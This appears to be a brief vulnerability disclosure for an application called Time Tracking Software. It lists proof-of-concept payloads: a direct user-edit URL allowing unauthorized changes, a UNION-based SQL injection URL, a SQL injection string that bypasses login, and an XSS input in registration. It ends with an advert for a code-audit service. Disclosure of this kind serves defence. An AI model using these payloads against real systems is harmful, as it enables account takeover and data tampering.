PoC/Exploit for Multiple Vulnerabilities in Time Tracking Software

Published Proof of Concept code - Multiple Vulnerabilities in Time Tracking Software.

Description
Available
Solution
Not available - check TTS Software website

1. Unauthorized data modifications.

http://host/timetracking/edituser.php?num=[userid]


2a. SQL Injection Example

http://host/timetracking/edituser.php?num=999%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13/*


2b. Authentication Bypass Example

Url: http://host/timetracking/login.php
Name: any
Password: ' union select 1,2,3,4,5,6,7,8,9,10,11,12,13/*


3. Cross-Site Scripting Example

Url: http://host/timetracking/register.php
User Name: <XSS>

Order Source Code Audit

Prevent attacks by source code analysis of your site made by our team.The work will be done by specialists in web security.

Advisories by vuln type